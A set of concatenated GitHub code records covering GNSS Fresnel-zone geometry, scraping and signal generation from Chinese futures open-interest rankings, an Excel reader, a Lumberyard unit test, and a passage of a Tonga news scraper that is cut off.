\"PollsVotersUsersResponseModel\"\n","repo_name":"vkbottle/types","sub_path":"vkbottle_types/codegen/responses/polls.py","file_name":"polls.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"45"} +{"seq_id":"72882838857","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTo compute and show the first Fresnel Zone.\n\n@author: Lubin Roineau, ENSG-Geomatics (internship at UT-ITC Enschede), Aug 26, 2022\n\"\"\"\n\n# Usefull librairies\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nfrom geod import *\nfrom shapely.geometry.polygon import Polygon\nimport pyproj\n\n# Usefull constants\nc = 299792458 # m.s-1 Speed of light\nL1_GPS = 1575.42e6 # Hz L1 frequency for GPS\nL2_GPS = 1227.60e6 # Hz L2 frequency for GPS\nL1_Glo = 1602.0e6 # Hz L1 frequency for GLONASS\nL2_Glo = 1246.0e6 # Hz 21 frequency for GLONASS\nlambda_L1_GPS = (c/L1_GPS) # m wavelenght for L1 GPS\nlambda_L2_GPS = (c/L2_GPS) # m wavelenght for L2 GPS\nlambda_L1_Glo = (c/L1_Glo) # m wavelenght for L1 Glo\nlambda_L2_Glo = (c/L2_Glo) # m wavelenght for L2 Glo\n\n###############################################################################\n\n# Calculation of the First Fresnel Zone\n\ndef firstFresnelZone(freq, h, elev):\n \"\"\"\n This function gets the size and center of the First Fresnel Zone ellipse.\n (based on a code by Kristine Larson and Carolyn Roesler).\n \n Parameters\n ----------\n freq: float\n Frequence of L_band in Hz.\n h: float\n Hight of the receiver in meters.\n elev: float\n Satellite elevation angle in degrees.\n \n Return\n ------\n a: float\n Semi-major axis, aligned with the satellite azimuth (meters).\n b: float\n Semi-minor axis (meters).\n R: float \n Locates the center of the ellispe on the satellite azimuth direction \n and R meters away from the base of the Antenna.\n \"\"\"\n # Valid frequencies\n lfreqgps = [L1_GPS, L2_GPS]\n lfreqglo = [L1_Glo, L2_Glo]\n\n # Check if frequency is valid\n if freq in lfreqgps and freq in lfreqglo:\n raise Exception(\"Wrong value for L_band frequency\") \n\n if elev>90:\n raise Exception(\"Wrong value for elevation, can't excede 90° !\") \n\n # Directly put elevation in radians\n elevR = np.radians(elev)\n \n if freq in lfreqgps:\n # delta = locus of points corresponding to a fixed delay;\n # typically the first Fresnel zone is is the\n # \"zone for which the differential phase change across\n # the surface is constrained to lambda/2\" (i.e. 1/2 the wavelength)\n d = lambda_L1_GPS/2\n\n # from the appendix of Larson and Nievinski, 2013\n # semi-minor axis\n b = ((lambda_L1_GPS*h)/np.sin(elevR)) + (lambda_L1_GPS/(2*np.sin(elevR)))**2\n b = np.sqrt(b)\n # semi-majpr axis\n a = b/np.sin(elevR)\n\n elif freq in lfreqglo:\n # delta = locus of points corresponding to a fixed delay;\n # typically the first Fresnel zone is is the\n # \"zone for which the differential phase change across\n # the surface is constrained to lambda/2\" (i.e. 1/2 the wavelength)\n d = lambda_L1_Glo/2\n\n # from the appendix of Larson and Nievinski, 2013\n # semi-minor axis\n b = ((lambda_L1_Glo*h)/np.sin(elevR)) + (lambda_L1_Glo/(2*np.sin(elevR)))**2\n b = np.sqrt(b)\n # semi-majpr axis\n a = b/np.sin(elevR)\n \n # determine distance to ellipse center in meters\n R = (h + d/np.sin(elevR)) / np.tan(elevR)\n\n return a, b, R\n\n###############################################################################\n\ndef plotEllipse(a, b, R, lon, lat, h, azim):\n \"\"\"\n Create an ellipse of a Fresnel zone.\n \n Parameters\n ----------\n a: float\n Semi-major axis, aligned with the satellite azimuth (meters).\n b: float\n Semi-minor axis (meters).\n R: float \n Locates the center of the ellispe on the satellite azimuth direction \n and R meters away from the base of the Antenna.\n lon,lat: float\n Position of the receiver in geographical coordinates (degrees).\n h: float\n Hight of the receiver in meters.\n azim: float\n Given azimut of ellipse in degrees.\n \n Return\n ------\n p: Polygon\n Polygon of the ellipse.\n area: float\n Area of the Polygon in square meter.\n \"\"\"\n # Check input for the azimuth in case\n if azim > 360 or azim < 0:\n raise Exception(\"Wrong value of azimuth, should be between 0 and 360!\") \n \n # Set coordinates of the receiver to cartesians\n transformer = pyproj.Transformer.from_crs(\"EPSG:4326\", \"EPSG:3857\", always_xy = True)\n X = transformer.transform(lon, lat)[0]\n Y = transformer.transform(lon, lat)[1]\n \n # Set to radians\n azim = m.radians(azim)\n \n # Change angle to match orientation of Python\n angle = 2*np.pi - azim + np.pi/2\n \n # Coordinate of the center\n xR = X + R*np.cos(angle) \n yR = Y + R*np.sin(angle)\n \n t = np.linspace(0, 2*np.pi, 100)\n\n # Parametric equation of ellipse\n x = xR + a*np.cos(angle)*np.cos(t) - b*np.sin(angle)*np.sin(t)\n y = yR + a*np.sin(angle)*np.cos(t) + b*np.cos(angle)*np.sin(t)\n\n # Polygon of ellipse in epsg:3857\n q = Polygon(list(zip(x,y)))\n area = q.area\n \n # Changing back the coordinates to geographic\n lon = []\n lat = []\n for i in range(len(x)):\n lo = transformer.transform(x[i], y[i],direction='INVERSE')[0]\n la = transformer.transform(x[i], y[i],direction='INVERSE')[1]\n lon.append(lo)\n lat.append(la)\n \n # Polygon of ellipse in epsg:4326\n p = Polygon(list(zip(lon,lat)))\n\n return p, area\n\n###############################################################################\n\ndef specularPoint(a, b, R, azim, color=None):\n \"\"\"\n This function just return the center of an ellipse, i.e the reflection point.\n\n Parameters\n ----------\n a: float\n Semi-major axis, aligned with the satellite azimuth (meters).\n b: float\n Semi-minor axis (meters).\n R: float \n Locates the center of the ellispe on the satellite azimuth direction \n and R meters away from the base of the Antenna.\n azim: list \n List of azimuths\n color: String (optional)\n Color of center points.\n\n Returns\n -------\n Plot of center of ellipses.\n\n \"\"\"\n for angle in azim:\n \n angle = 2*np.pi - angle + np.pi/2\n xR = R*np.cos(angle) # x-position of the center\n yR = R*np.sin(angle) # y-position of the center\n\n if color != None:\n plt.axis('equal')\n plt.scatter(xR,yR, color=color)\n else:\n plt.axis('equal')\n plt.scatter(xR,yR)\n\n return\n\n###############################################################################","repo_name":"lroineau/gnssr4river","sub_path":"gnssr4river/Fresnel/fresnelzone.py","file_name":"fresnelzone.py","file_ext":"py","file_size_in_byte":6681,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"45"} +{"seq_id":"43085047873","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 22 16:26:42 2018\n\n@author: weiss\n\n2018\n\n4.22\n1.增加了近月函数this_contract()\n2.调整了部分语法结构适应合约key\n3.调整了部分逻辑冗余\n\n4.23\n1.修复更新bug\n\n4.30\n1.修复近月合约数据缺失\n\n5.7\n1.改正近月合约定义\n\n5.8\n1.修正合并数据逻辑\n\n5.10\n1.修正合并数据部分的代码误删和错误\n2.精简和优化部分代码结构\n\n5.11-5.12\n1.增加contract_indic选项(None、'this'、'this&next'),丰富相关逻辑\n2.优化代码逻辑结构\n\n5.18\n1.增加中金所爬虫函数以及对应信号函数\n\n7.16\n1.增加中金所爬虫函数的向后更新功能\n2.增加中金所前5、前10的信号,优化输出格式\n\"\"\"\n\n\nimport time as t\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport os\nimport warnings\nwarnings.filterwarnings(\"ignore\")\ntry:\n from urllib.request import urlopen, Request\n from urllib.error import HTTPError\nexcept ImportError:\n from urllib2 import urlopen, Request\n from urllib2 import HTTPError\nimport xml.etree.ElementTree as ET\n#from WindPy import *\n#w.start()\n\n\nclass oir(object):\n\n def __init__(self,homePath, updatebegin = 20100101, endDate = \\\n int(t.strftime('%Y%m%d',t.localtime(t.time()))) ,params = [5,10,20]):\n self.homePath = homePath + '/'\n self.tradeDateList = pd.read_csv(self.homePath +'tradeDateList.csv')\n self.params = params\n self.suffix = '.h5'\n self.beginDate = updatebegin\n self.time = t.time()\n if t.localtime(self.time).tm_hour < 15:\n self.workDate = int(t.strftime('%Y%m%d',\\\n t.localtime(self.time - 24 * 60 *60)))\n else:\n self.workDate = int(t.strftime('%Y%m%d',t.localtime(self.time)))\n #确定所需更新的日期\n if endDate < self.workDate:\n self.workDate = endDate\n\n def this_contract(self,windSymbol):\n symbol = windSymbol.split('.')[0]\n def change_spot(y_month):\n weekday = datetime.datetime.strptime(y_month+'-01', \"%Y-%m-%d\").weekday()\n if weekday <= 5:\n return (14 + 5 - weekday)\n else:\n return (14 + 6)\n def this_month(date):\n day = np.int32(str(date)[6:8])\n if day >= change_spot(str(date)[:4]+'-'+str(date)[4:6]):\n month = np.int32(str(date)[4:6])\n if month == 12:\n return str(np.int32(str(date)[2:4])+1)+'01'\n else:\n return str(date)[2:4]+\"%02d\"%(month%12+1)\n else:\n return str(date)[2:6]\n self.tradeDateList[symbol+'_contract'] = \\\n self.tradeDateList['tradeDate'].apply(lambda x : symbol+this_month(x))\n self.tradeDateList.to_csv(self.homePath +'tradeDateList.csv', index=None)\n\n def next_contract(self,windSymbol):\n symbol = windSymbol.split('.')[0]\n def _next(contract):\n month = np.int32(contract[-2:])\n if month%3 == 0:\n return '0'\n else:\n return contract[:-2]+\"%02d\"%(month+(3-month%3))\n self.tradeDateList[symbol+'_next'] = \\\n self.tradeDateList[symbol+'_contract'].apply(lambda x : _next(x))\n self.tradeDateList.to_csv(self.homePath +'tradeDateList.csv', index=None)\n\n def updateDataFromWind(self,windSymbol,contract_indic=None):\n symbol = windSymbol.split('.')[0]\n colNames = ['tradeDate','ranks','member_name','long_position',\n 'long_position_increase','short_position',\n 'short_position_increase','volume']\n colNamesFinal = ['tradeDate','ranks','member_name','long_position',\n 'long_position_increase','short_position',\n 'short_position_increase','net_position',\n 'net_position_increase','volume','updatingTime']\n colNamesCon = ['tradeDate','member_name','long_position',\n 'long_position_increase','short_position',\n 'short_position_increase','net_position',\n 'net_position_increase','volume','updatingTime']\n\n #获取合约数据的函数\n def getFutureoirByDate(beginDate,endDate,windSymbol,windCode,position):\n if windCode:\n data = w.wset(\"futureoir\",\"startdate=\"+beginDate+\";enddate=\"+\n endDate+\";varity=\"+windSymbol+\";wind_code=\" +\n windCode + \";order_by=\" + position +\n \";ranks=all;field=date,ranks,member_name,long_position,long_position_increase,short_position,short_position_increase,vol\")\n else:\n data = w.wset(\"futureoir\",\"startdate=\"+beginDate+\";enddate=\"+\n endDate+\";varity=\"+windSymbol+ \";order_by=\" + position +\n \";ranks=all;field=date,ranks,member_name,long_position,long_position_increase,short_position,short_position_increase,vol\")\n if len(data.Data) == 0:\n return pd.DataFrame([])\n dataout = pd.DataFrame()\n try:\n for i in range(len(colNames)):\n dataout[colNames[i]] = data.Data[i]\n except:\n print(windSymbol + \" cannot get data on \" + date + ' !')\n return pd.DataFrame([])\n dataout['tradeDate'] = dataout['tradeDate'].astype(str)\n dataout['tradeDate'] = pd.to_datetime(dataout['tradeDate'],\\\n format='%Y-%m-%d',errors='ignore')\n dataout['net_position'] = dataout['long_position'] -\\\n dataout['short_position']\n dataout['net_position_increase'] = \\\n dataout['long_position_increase'] \\\n - dataout['short_position_increase']\n return dataout\n\n dateList = pd.DataFrame()\n dateList['tradeDate'] = self.tradeDateList['tradeDate'].astype(str)\n if contract_indic == 'this' or contract_indic == 'this&next':\n self.this_contract(windSymbol)\n dateList[symbol+'_contract'] = self.tradeDateList[symbol+'_contract']\\\n +'.'+ windSymbol.split('.')[1]\n else:\n dateList[symbol+'_contract'] = [None]*len(dateList)\n\n for position in ['long','short']:\n endDate = str(self.workDate)\n #如果存在数据,从上次更新日之后更新\n status = 0\n data = pd.DataFrame()\n\n if os.path.exists(self.homePath + 'rank' + self.suffix):\n try:\n lastData = pd.read_hdf(self.homePath + 'rank' \\\n + self.suffix, position +'_'+ windSymbol)\n if len(lastData) == 0:\n continue\n lastDate = str(lastData['tradeDate'].iloc[-1])\n lastDate = lastDate[0:4] + lastDate[5:7] + lastDate[8:10]\n beginDate = dateList[dateList['tradeDate'] > lastDate]\\\n ['tradeDate'].iloc[0]\n beginDate = str(beginDate)\n if beginDate > endDate:\n continue\n print(windSymbol+ '_' +position+ ', begin:' + beginDate +\\\n ',end:' + endDate + ' updating...')\n data = lastData\n except:\n status = 1\n #不存在\n else:\n status = 1\n if status == 1:\n beginDate = str(self.beginDate)\n print(windSymbol+ '_' +position+', begin:'+\\\n beginDate+' getting...')\n\n tempDateList = dateList[dateList['tradeDate'] >= beginDate]\n tempDateList = tempDateList[tempDateList['tradeDate'] <=\\\n endDate].reset_index(drop=True)\n for i in range(len(tempDateList)):\n date = tempDateList['tradeDate'][i]\n contract = tempDateList[symbol+'_contract'][i]\n print(date)\n if data.empty:\n data = getFutureoirByDate(date,date,windSymbol,\\\n contract,position)\n else:\n temdata = getFutureoirByDate(date,date,windSymbol,\\\n contract,position)\n data = pd.concat([data,temdata])\n data = data.reset_index(drop=True)\n data['updatingTime'] = t.strftime('%Y-%m-%d %H:%M:%S')\n data = data[colNamesFinal]\n data.to_hdf(self.homePath + 'rank'+self.suffix, position + '_' +\\\n windSymbol)\n def x_or_y(df):\n c = df.columns\n choise = np.sign((df[c[0]]-df[c[1]]).apply(np.sign)+1/2)\n result = pd.DataFrame()\n result[c[0][:-2]] = (df[c[0]]*(1+choise)+df[c[1]]*(1-choise))/2\n if len(c)>2:\n result[c[2][:-2]] = (df[c[2]]*(1+choise)+df[c[3]]*(1-choise))/2\n return result\n\n #生成连续数据\n print('continous data merging...')\n long_p = pd.read_hdf(self.homePath + 'rank'+self.suffix, \\\n 'long_' + windSymbol)\n short_p = pd.read_hdf(self.homePath + 'rank'+self.suffix, \\\n 'short_' + windSymbol)\n con_position = pd.merge(long_p.drop(['ranks','updatingTime'],axis = 1)\\\n .fillna(0),short_p.drop(['ranks','updatingTime'],\\\n axis = 1).fillna(0),on=['member_name','tradeDate'],\\\n how = 'outer').fillna(0)\n con_position = con_position.sort_values(\\\n by=['tradeDate','long_position_x'],ascending = [True,False])\n con_p = pd.DataFrame(data = [],\\\n index = range(len(con_position)),columns = colNamesCon)\n con_position = con_position.reset_index()\n for z in ['long_position','short_position','net_position']:\n print(z +' merging...')\n p_df = con_position[[z+'_x',z+'_y',z+'_increase_x',z+'_increase_y']]\n con_p[[z,z+'_increase']] = x_or_y(p_df)\n p_df = con_position[['volume_x','volume_y']]\n print('volume merging...')\n con_p['volume'] = x_or_y(p_df)\n\n con_p['tradeDate'] = con_position['tradeDate']\n con_p['member_name'] = con_position['member_name']\n con_p['updatingTime'] = t.strftime('%Y-%m-%d %H:%M:%S')\n con_p=con_p[colNamesCon]\n con_p.to_hdf(self.homePath+'rank'+self.suffix,windSymbol)\n\n if contract_indic == 'this&next':\n self.next_contract(windSymbol)\n dateList[symbol+'_next'] = self.tradeDateList[symbol+'_next']\\\n +'.'+ windSymbol.split('.')[1]\n for position in ['long','short']:\n endDate = str(self.workDate)\n #如果存在数据,从上次更新日之后更新\n status = 0\n data = pd.DataFrame()\n\n if os.path.exists(self.homePath + 'rank' + self.suffix):\n try:\n lastData = pd.read_hdf(self.homePath + 'rank' \\\n + self.suffix, position +'_'+ windSymbol+'_next')\n if len(lastData) == 0:\n continue\n lastDate = str(lastData['tradeDate'].iloc[-1])\n lastDate = lastDate[0:4] + lastDate[5:7] + lastDate[8:10]\n beginDate = dateList[dateList['tradeDate'] > lastDate]\\\n ['tradeDate'].iloc[0]\n beginDate = str(beginDate)\n if beginDate > endDate:\n continue\n print(windSymbol+'_next'+ '_' +position+ ', begin:' +\\\n beginDate +',end:' + endDate + ' updating...')\n data = lastData\n except:\n status = 1\n #不存在\n else:\n status = 1\n if status == 1:\n beginDate = str(self.beginDate)\n print(windSymbol+'_next'+ '_' +position+', begin:'+\\\n beginDate+' getting...')\n\n tempDateList = dateList[dateList['tradeDate'] >= beginDate]\n tempDateList = tempDateList[tempDateList['tradeDate'] <=\\\n endDate].reset_index(drop=True)\n for i in range(len(tempDateList)):\n date = tempDateList['tradeDate'][i]\n contract = tempDateList[symbol+'_next'][i]\n if len(contract)>6:\n print(date)\n if data.empty:\n data = getFutureoirByDate(date,date,windSymbol,\\\n contract,position)\n else:\n temdata = getFutureoirByDate(date,date,windSymbol,\\\n contract,position)\n data = pd.concat([data,temdata])\n data = data.reset_index(drop=True)\n data['updatingTime'] = t.strftime('%Y-%m-%d %H:%M:%S')\n data = data[colNamesFinal]\n data.to_hdf(self.homePath + 'rank'+self.suffix, position + '_' +\\\n windSymbol+'_next')\n\n #生成连续数据\n print('continous data merging...')\n long_p = pd.read_hdf(self.homePath + 'rank'+self.suffix, \\\n 'long_' + windSymbol+'_next')\n short_p = pd.read_hdf(self.homePath + 'rank'+self.suffix, \\\n 'short_' + windSymbol+'_next')\n con_position = pd.merge(long_p.drop(['ranks','updatingTime'],axis = 1)\\\n .fillna(0),short_p.drop(['ranks','updatingTime'],\\\n axis = 1).fillna(0),on=['member_name','tradeDate'],\\\n how = 'outer').fillna(0)\n con_position = con_position.sort_values(\\\n by=['tradeDate','long_position_x'],ascending = [True,False])\n con_p = pd.DataFrame(data = [],\\\n index = range(len(con_position)),columns = colNamesCon)\n con_position = con_position.reset_index()\n for z in ['long_position','short_position','net_position']:\n print(z +'_next merging...')\n p_df = con_position[[z+'_x',z+'_y',z+'_increase_x',z+'_increase_y']]\n con_p[[z,z+'_increase']] = x_or_y(p_df)\n p_df = con_position[['volume_x','volume_y']]\n print('volume_next merging...')\n con_p['volume'] = x_or_y(p_df)\n\n con_p['tradeDate'] = con_position['tradeDate']\n con_p['member_name'] = con_position['member_name']\n con_p['updatingTime'] = t.strftime('%Y-%m-%d %H:%M:%S')\n con_p=con_p[colNamesCon]\n con_p.to_hdf(self.homePath+'rank'+self.suffix,windSymbol+'_next')\n\n print (symbol + \" futureoir source data update complete!\")\n return\n\n def getSignal(self,windSymbol,contract_indic=None):\n con_position = pd.read_hdf(self.homePath+'rank'+self.suffix,windSymbol)\n #强制默认参数为[5,10,20],否则出错\n sum_position = pd.DataFrame(data = [],index = range(len(con_position)),\\\n columns = ['tradeDate']+['long_position_increase5']+\\\n ['long_position_increase10']+['long_position_increase20']+\\\n ['short_position_increase5']+['short_position_increase10']+\\\n ['short_position_increase20'])\n #生成排名数据\n j = 0\n for i in range(len(con_position)):\n if i == 0 or (con_position['tradeDate'][i] != \\\n con_position['tradeDate'][i-1]):\n sum_position['tradeDate'][j] = con_position['tradeDate'][i]\n for tem_i in range(len(self.params)):\n sum_position['long_position_increase_'+str(self.params[tem_i])][j] = \\\n con_position['long_position_increase'][i+len(self.params)-1-tem_i]\n sum_position['short_position_increase_'+str(self.params[tem_i])][j] = \\\n con_position['short_position_increase'][i+len(self.params)-1-tem_i]\n j = j + 1\n sum_position = sum_position.iloc[0:j]\n\n if contract_indic == 'this&next':\n con_position_next = pd.read_hdf(self.homePath+'rank'+self.suffix,windSymbol+'_next')\n sum_position_next = pd.DataFrame(data = [],index = range(len(con_position_next)),\\\n columns = ['tradeDate']+['long_position_increase5']+\\\n ['long_position_increase10']+['long_position_increase20']+\\\n ['short_position_increase5']+['short_position_increase10']+\\\n ['short_position_increase20'])\n #生成排名数据\n j = 0\n for i in range(len(con_position_next)):\n if i == 0 or (con_position_next['tradeDate'][i] != \\\n con_position_next['tradeDate'][i-1]):\n sum_position_next['tradeDate'][j] = con_position_next['tradeDate'][i]\n for tem_i in range(len(self.params)):\n sum_position_next['long_position_increase_'\\\n +str(self.params[tem_i])][j] = \\\n con_position_next['long_position_increase']\\\n [i+len(self.params)-1-tem_i]\n sum_position_next['short_position_increase_'\\\n +str(self.params[tem_i])][j] = \\\n con_position_next['short_position_increase']\\\n [i+len(self.params)-1-tem_i]\n j = j + 1\n sum_position_next = sum_position_next.iloc[0:j]\n\n sum_position = sum_position.merge(sum_position_next,on=['tradeDate'],how='outer')\n for col in ['long_position_increase5','long_position_increase10',\n 'long_position_increase20','short_position_increase5',\n 'short_position_increase10','short_position_increase20']:\n sum_position[col+'_y'].fillna(0,inplace=True)\n sum_position[col] = sum_position[col+'_x']+sum_position[col+'_y']\n\n #signal\n signal = pd.DataFrame()\n signal['tradeDate'] = sum_position['tradeDate']\n for k in self.params:\n signal['long' + str(k)] = sum_position['long_position_increase_'+str(k)]\n signal['short' + str(k)] = sum_position['short_position_increase_'+str(k)]\n signal['signal' + str(k)] = (sum_position['long_position_increase_'+str(k)].\\\n apply(np.sign) - sum_position['short_position_increase_'+str(k)].\\\n apply(np.sign))//2\n print(windSymbol.split('.')[0] + ' signal complete !')\n return signal\n\n def get_rank_data(self,date,variety):\n month = str(date)[0:6]\n day = str(date)[6:]\n SIM_HAEDERS = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}\n try:\n xml1 = urlopen(Request('http://www.cffex.com.cn/sj/ccpm/'+month+'/'+day+'/'+variety+'.xml',\n headers=SIM_HAEDERS)).read().decode('utf-8', 'ignore')\n except HTTPError as reason:\n if reason.code != 404:\n print(404)\n\n root = ET.fromstring(xml1)\n\n data_attr = ['instrumentid','tradingday','datatypeid','rank','shortname',\n 'volume','varvolume','partyid','productid']\n data_attr_old = ['instrumentId','tradingDay','dataTypeId','rank','shortname',\n 'volume','varVolume','partyid','productid']\n \"\"\"\n posi_attr = ['tradingday','instrumentid','volumeamt','varvolumeamt',\n 'buyvolumeamt','buyvarvolumeamt','sellvolumeamt','sellvarvolumeamt',\n 'productid','futurecompany']\n \"\"\"\n data = []\n for d in root.findall('data'):\n temp = []\n try:\n for attr in data_attr:\n t = d.find(attr).text\n temp.append(t)\n data.append(temp)\n #print(temp)\n except:\n for attr in data_attr_old:\n t = d.find(attr).text\n temp.append(t)\n data.append(temp)\n vol5 = [0,0,0]\n varvol5 = [0,0,0]\n vol10 = [0,0,0]\n varvol10 = [0,0,0]\n vol = [0,0,0]\n varvol = [0,0,0]\n for x in data:\n if int(x[3])<=10:\n vol10[int(x[2])] +=int(x[5])\n varvol10[int(x[2])] += int(x[6])\n if int(x[3])<=5:\n vol5[int(x[2])] +=int(x[5])\n varvol5[int(x[2])] += int(x[6])\n vol[int(x[2])] +=int(x[5])\n varvol[int(x[2])] += int(x[6])\n return (varvol5[1],varvol5[2],varvol10[1],varvol10[2],varvol[1],varvol[2])\n\n def get_signal_cffex(self,windSymbol):\n symbol = windSymbol.split('.')[0]\n dateList = pd.DataFrame()\n dateList['tradeDate'] = self.tradeDateList['tradeDate'].astype(str)\n try:\n last_chg = pd.read_csv(self.homePath+symbol+'_chg.csv')\n first_date = last_chg['tradeDate'].iloc[0]\n if first_date > self.beginDate:\n update_idx = 0\n tempDateList = dateList[dateList['tradeDate'] >= str(self.beginDate)]\n else:\n last_date = last_chg['tradeDate'].iloc[-1]\n print('Last date:', last_date)\n tempDateList = dateList[dateList['tradeDate'] > str(last_date)]\n update_idx = 1\n except:\n update_idx = 0\n tempDateList = dateList[dateList['tradeDate'] >= str(self.beginDate)]\n tempDateList = tempDateList[tempDateList['tradeDate'] <=str(self.workDate)]\\\n .reset_index(drop=True)\n L1, L2, L3, S1, S2, S3 = [], [], [], [], [], []\n for date in tempDateList['tradeDate']:\n print(date)\n try:\n l1,s1,l2,s2,l3,s3 = self.get_rank_data(date,symbol)\n L1.append(l1)\n L2.append(l2)\n L3.append(l3)\n S1.append(s1)\n S2.append(s2)\n S3.append(s3)\n except:\n L1.append(0)\n L2.append(0)\n L3.append(0)\n S1.append(0)\n S2.append(0)\n S3.append(0)\n chg_df = pd.DataFrame({'tradeDate':tempDateList['tradeDate'],\\\n 'long5':L1,'short5':S1,\\\n 'long10':L2,'short10':S2,\\\n 'long20':L3,'short20':S3,\\\n })\n if update_idx == 1:\n chg_df = pd.concat([last_chg,chg_df])\n chg_cols = ['tradeDate','long5','long10','long20',\\\n 'short5','short10','short20']\n chg_df = chg_df[chg_cols]\n chg_df.to_csv(self.homePath+symbol+'_chg.csv',index = None)\n signal = pd.DataFrame()\n signal_cols = chg_cols+['signal5','signal10','signal20']\n signal['tradeDate'] = chg_df['tradeDate']\n for para in ['5','10','20']:\n signal['long'+para] = chg_df['long'+para]\n signal['short'+para] = chg_df['short'+para]\n signal['signal'+para] = ((chg_df['long'+para].apply(np.sign) - \\\n chg_df['short'+para].apply(np.sign))/2).apply(int)\n return signal[signal_cols]\n\n\nif __name__=='__main__':\n homePath = '/Users/weiss/Desktop/zxjt'\n windSymbol = 'IF.CFE'\n IF = oir(homePath,updatebegin = 20100416,endDate = 20180715)\n #IF.updateDataFromWind(windSymbol,contract_indic='this&next')\n #sig = IF.getSignal(windSymbol,contract_indic='this&next')\n sig = IF.get_signal_cffex(windSymbol)\n sig.to_csv(homePath + '/signal.csv',index = None)\n","repo_name":"nkzhengwt/Spyder_cta","sub_path":"get_oir_c.py","file_name":"get_oir_c.py","file_ext":"py","file_size_in_byte":24492,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"45"} +{"seq_id":"19680775439","text":"import xlrd\nfrom datetime import datetime,date\n\n# 文件路径\nfile_path = '1.xlsx'\n# 设置编码\nxlrd.Book.encoding = 'utf8'\n# 获取数据\ndata = xlrd.open_workbook(file_path)\n# 获取所有的sheet\nsheet = data.sheet_names()\n\nfor item in sheet:\n\ttable = data.sheet_by_name(item)\n\t# print(item)\n\t# 取总行数\n\t# print(table.nrows)\n\t# 取总列数\n\t# print(table.ncols)\n\tprint(item, \"行数\", table.nrows, \"列数\", table.ncols)\n\n# sheet1的数据\nsheet1_data = data.sheet_by_index(0)\nsheet1_nrows = sheet1_data.nrows\nsheet1_ncols = sheet1_data.ncols\n\nfor i in range(sheet1_nrows):\n\tfor j in range(sheet1_ncols):\n\t\t# print(i, \"※\", j, end=' ')\n\t\tprint(sheet1_data.cell(i,j).value, sheet1_data.cell(i,j).ctype, end=' ')\n\tprint()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"wangfan1996/python","sub_path":"pythonProject/other/excel/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"22785342247","text":"import unittest\nfrom unittest import mock\nfrom resource_manager_common import constant\n\nfrom resource_types import Custom_ResourceGroupConfiguration\nfrom cgf_utils import custom_resource_response\n\n\nclass UnitTest_CloudGemFramework_ProjectResourceHandler_ResourceGroupConfiguration(unittest.TestCase):\n\n event = {}\n\n context = {}\n\n def setUp(self):\n self.event = {\n 'ResourceProperties': {\n 'ConfigurationBucket': 'TestBucket',\n 'ConfigurationKey': 'TestKey',\n 'ResourceGroupName': 'TestResourceGroup'\n },\n 'StackId': 'arn:aws:cloudformation:TestRegion:TestAccount:stack/TestStack/TestUUID'\n }\n\n\n def test_handler(self):\n\n expected_data = {\n 'ConfigurationBucket': 'TestBucket',\n 'ConfigurationKey': 'TestKey/resource-group/TestResourceGroup',\n 'TemplateURL': 'https://s3.amazonaws.com/TestBucket/TestKey/resource-group/TestResourceGroup/'+constant.RESOURCE_GROUP_TEMPLATE_FILENAME\n }\n\n expected_physical_id = 'CloudCanvas:LambdaConfiguration:TestStack:TestResourceGroup'\n \n with mock.patch.object(custom_resource_response, 'success_response') as mock_custom_resource_response_succeed:\n Custom_ResourceGroupConfiguration.handler(self.event, self.context)\n mock_custom_resource_response_succeed.assert_called_with(expected_data, expected_physical_id)\n\n","repo_name":"aws/lumberyard","sub_path":"dev/Gems/CloudGemFramework/v1/AWS/lambda-code/ProjectResourceHandler/test/test_ResourceGroupConfigurationResourceHandler.py","file_name":"test_ResourceGroupConfigurationResourceHandler.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1982,"dataset":"github-code","pt":"45"} +{"seq_id":"40218000232","text":"import os\nimport sys\nsys.path.insert(0, \"../../\")\nimport pandas as pd\nfrom src.scraper.scrape import WebScraper\n\ntarget_dir = sys.path[0] + \"data/text/tonga/\"\nif not os.path.exists(target_dir):\n os.mkdir(target_dir)\n\nsearch_urls = [f\"https://matangitonga.to/topic/all?page={num}\"\n for num in range(1, 932)]\nmtg = WebScraper(\"html.parser\")\nurls_raw = mtg.scrape_urls(search_urls, [\"views-field views-field-title\",\n \"views-field views-field-term-node-tid\",\n \"views-field views-field-field-first-publication\",\n \"views-field views-field-field-location\"],\n speed_up=True)\nurls_info = {\n \"url\" : [],\n \"date\": [],\n \"title\" : [],\n \"tag\": [],\n \"location\": [],\n}\nfor page in urls_raw:\n page_url, page_raw = page[0], page[1]\n urls_info[\"title\"].extend([i.text for i in page_raw[0]])\n urls_info[\"url\"].extend([i.find(\"a\")[\"href\"] for i in page_raw[0]])\n urls_info[\"date\"].extend([i.text for i in page_raw[2]])\n urls_info[\"tag\"].extend([i.text for i in page_raw[1]])\n urls_info[\"location\"].extend([i.text.strip() for i in page_raw[3]])\n\nmtg_urls = pd.DataFrame(urls_info)\nmtg_urls[\"url\"] = [f\"https://matangitonga.to{url}\" for url in mtg_urls.url]\nmtg_urls[\"date\"] = pd.to_datetime(mtg_urls[\"date\"])\nmtg_urls.to_csv(f\"{target_dir}matangi_urls.csv\", encoding=\"utf-8\")\n\n# \nurls_df = pd.read_csv(target_dir+\"matangi_urls.csv\").drop(\"Unnamed: 0\", axis=1)\nurls_df[\"tonga\"] = urls_df[\"location\"].apply(lambda x: \"tonga\" in str(x).lower())\nnews_urls = urls_df[urls_df[\"tonga\"] == True][\"url\"].tolist()\nprint_urls_raw = mtg.scrape_urls(news_urls, \"print-page\", speed_up=True)\n\n# Create a mapping between page urls and \nurls_mapping = []\nfor i in print_urls_raw:\n original_url = i[0]\n print_url = i[1][0][\"href\"]\n urls_mapping.append([original_url, print_url])\nurls_map_df = pd.DataFrame(urls_mapping, columns=[\"original_url\", 